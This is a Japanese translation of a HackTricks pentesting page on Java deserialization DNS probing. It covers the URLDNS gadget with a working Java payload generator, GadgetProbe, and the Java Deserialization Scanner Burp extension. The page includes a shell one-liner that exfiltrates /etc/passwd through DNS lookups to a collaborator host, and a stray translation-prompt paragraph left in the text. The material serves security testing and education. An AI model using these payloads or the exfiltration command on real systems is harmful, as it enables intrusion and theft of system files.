Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-12-02 01:19:45 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md
Translator workflow e90c803209 Translated to Japanese
2023-07-07 23:42:27 +00:00

14 KiB
Raw Blame History

Java DNSデシリアライゼーション、GadgetProbe、およびJavaデシリアライゼーションスキャナー

Java DNSデシリアライゼーション、GadgetProbe、およびJavaデシリアライゼーションスキャナー

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

デシリアライゼーションにおけるDNSリクエスト

クラスjava.net.URLSerializableを実装しています。これは、このクラスがシリアライズ可能であることを意味します。

public final class URL implements java.io.Serializable {

このクラスは興味深い振る舞いをします。ドキュメントによると、「2つのホストは、両方のホスト名が同じIPアドレスに解決される場合に同等と見なされます」。したがって、URLオブジェクトがequalsまたはhashCodeいずれかの関数を呼び出すたびに、IPアドレスを取得するためのDNSリクエストが送信されます。

URLオブジェクトから**hashCode関数を呼び出すのは非常に簡単で、このオブジェクトをデシリアライズされるHashMapに挿入するだけで十分です。これは、HashMapreadObject**関数の最後にこのコードが実行されるためです:

private void readObject(java.io.ObjectInputStream s)
throws IOException, ClassNotFoundException {
[   ...   ]
for (int i = 0; i < mappings; i++) {
[   ...   ]
putVal(hash(key), key, value, false, false);
}

次に、HashMap内のすべての値を使用してputVal実行します。しかし、より重要なのは、すべての値でhashが呼び出されることです。以下はhash関数のコードです:

static final int hash(Object key) {
int h;
return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
}

以下のように観察できるように、HashMapをデシリアライズする際には、関数hashオブジェクトごとに実行され、**hashの実行中にはオブジェクトの.hashCode()が実行されます。したがって、URLオブジェクトを含むHashMap**をデシリアライズすると、URLオブジェクト.hashCode()を実行します。

では、URLObject.hashCode()のコードを見てみましょう:

public synchronized int hashCode() {
if (hashCode != -1)
return hashCode;

hashCode = handler.hashCode(this);
return hashCode;

以下のように、URLObject.hashCode()を実行すると、hashCode(this)と呼ばれます。次に、この関数のコードを見ることができます。

protected int hashCode(URL u) {
int h = 0;

// Generate the protocol part.
String protocol = u.getProtocol();
if (protocol != null)
h += protocol.hashCode();

// Generate the host part.
InetAddress addr = getHostAddress(u);
[   ...   ]

以下は、/hive/hacktricks/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.mdというファイルからのコンテンツです。関連する英文を日本語に翻訳し、翻訳を返し、マークダウンとHTMLの構文を正確に保ちます。コード、ハッキング技術の名前、ハッキングの言葉、クラウド/SaaSプラットフォームの名前Workspace、aws、gcpなど、'leak'という単語、ペンテスト、およびマークダウンタグなどは翻訳しないでください。また、翻訳とマークダウンの構文以外の追加のものは追加しないでください。

getHostAddressがドメインに対して実行され、DNSクエリが発行されることがわかります。

したがって、このクラスは、**シリアライゼーション**が可能であることを**示すために**、または情報を**漏洩**するために、DNSクエリを**実行**するために**悪用**される可能性があります(コマンドの実行結果をサブドメインに追加することができます)。

### URLDNSペイロードのコード例

[ここでysoserialからURDNSペイロードのコードを見つけることができます](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/URLDNS.java)。ただし、コードの理解を容易にするために、ysoserialのものをベースにした独自のPoCを作成しました。

import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.InetAddress;
import java.net.URLConnection;
import java.net.URLStreamHandler;
import java.util.HashMap;
import java.net.URL;

public class URLDNS {
public static void GeneratePayload(Object instance, String file)
throws Exception {
//Serialize the constructed payload and write it to the file
File f = new File(file);
ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
out.writeObject(instance);
out.flush();
out.close();
}
public static void payloadTest(String file) throws Exception {
//Read the written payload and deserialize it
ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));
Object obj = in.readObject();
System.out.println(obj);
in.close();
}

public static void main(final String[] args) throws Exception {
String url = "http://3tx71wjbze3ihjqej2tjw7284zapye.burpcollaborator.net";
HashMap ht = new HashMap(); // HashMap that will contain the URL
URLStreamHandler handler = new SilentURLStreamHandler();
URL u = new URL(null, url, handler); // URL to use as the Key
ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.

// During the put above, the URL's hashCode is calculated and cached.
// This resets that so the next time hashCode is called a DNS lookup will be triggered.
final Field field = u.getClass().getDeclaredField("hashCode");
field.setAccessible(true);
field.set(u, -1);

//Test the payloads
GeneratePayload(ht, "C:\\Users\\Public\\payload.serial");
}
}


class SilentURLStreamHandler extends URLStreamHandler {

protected URLConnection openConnection(URL u) throws IOException {
return null;
}

protected synchronized InetAddress getHostAddress(URL u) {
return null;
}
}

追加情報

GadgetProbe

GadgetProbeは、Burp Suite App StoreExtenderからダウンロードできます。

GadgetProbeは、サーバーのJavaクラスにいくつかのJavaクラスが存在するかどうかを調べるために使用されます。これにより、既知の脆弱性に対して脆弱性があるかどうかを知ることができます。

動作原理

GadgetProbeは、前のセクションと同じDNSペイロードを使用しますが、DNSクエリを実行する前に任意のクラスをデシリアライズしようとします。任意のクラスが存在する場合、DNSクエリ送信され、GadgetProbeはこのクラスが存在することを記録します。DNSリクエストが送信されない場合、これは任意のクラスが正常にデシリアライズされなかったことを意味します。したがって、それは存在しないか、シリアライズ可能/攻撃可能ではないことを意味します。

GitHub内のGadgetProbeにはいくつかのワードリストがあります。

追加情報

Java Deserialization Scanner

このスキャナは、Burp App StoreExtenderからダウンロードできます。
この拡張機能には、パッシブおよびアクティブ機能があります。

パッシブ

デフォルトでは、送信されたすべてのリクエストとレスポンスをパッシブにチェックし、Javaシリアライズのマジックバイトを探し、見つかった場合には脆弱性の警告を表示します。

アクティブ

手動テスト

リクエストを選択し、右クリックして「Send request to DS - Manual Testing」を選択します。
次に、Deserialization Scanner Tab --> Manual testing tab 内で挿入ポイントを選択し、テストを実行します(使用されているエンコーディングに応じて適切な攻撃を選択します)。

これは「手動テスト」と呼ばれていますが、かなり自動化されています。ウェブサーバー上で利用可能なライブラリをチェックし、デシリアライズどのysoserialペイロードに対して脆弱かを自動的にチェックし、脆弱なライブラリを強調表示します。脆弱なライブラリをチェックするためには、Javas SleepsCPUの消費によるsleeps、または先に述べたようにDNSを使用して起動するように選択できます。

攻撃

脆弱なライブラリを特定したら、リクエストを_Exploiting Tab_に送信できます。
このタブでは、再び挿入ポイントを選択し、作成するペイロードコマンドを入力します。その後、適切なAttackボタンを押すだけです。

Java Deserialization DNS Exfil情報

ペイロードを以下のように実行するようにしてください:

(i=0;tar zcf - /etc/passwd | xxd -p -c 31 | while read line; do host $line.$i.cl1k22spvdzcxdenxt5onx5id9je73.burpcollaborator.net;i=$((i+1)); done)

詳細情報

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥